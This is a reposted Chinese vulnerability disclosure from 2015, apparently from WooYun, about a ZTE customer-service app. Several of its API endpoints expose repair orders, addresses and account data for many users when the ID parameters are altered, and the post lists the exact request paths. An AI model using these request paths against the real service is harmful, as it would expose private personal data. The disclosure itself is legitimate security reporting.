记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

中兴某应用APP设计缺陷存在多处越权访问(泄露大量数据)

2015-03-22 01:00

中兴终端掌上服务站的APP,在登录界面的右边扫描二维码就可以下载:

code 区域
http://rma.zte.com.cn/user/loginPage.html

1.jpg







#越权1,几万单维修单,泄露姓名,住址,电话:

code 区域
/rmaRepair/getRepairInfoById.app?detailId=9157&billType=3&curStateId=63



3.jpg

2.jpg





#越权2 几万收货地址信息,私人信息,一览无余:

code 区域
/rmaAddress/getAllAddressByUserId.app?userId=



11.jpg

10.jpg



#越权3,几万账户信息:

code 区域
/rmaUser/getUserInfoById.app?userId=



5.jpg

4.jpg

漏洞证明:

修复方案:

鉴权~

知识来源: www.wooyun.org/bugs/wooyun-2015-095703

阅读:90177 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“中兴某应用APP设计缺陷存在多处越权访问(泄露大量数据)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云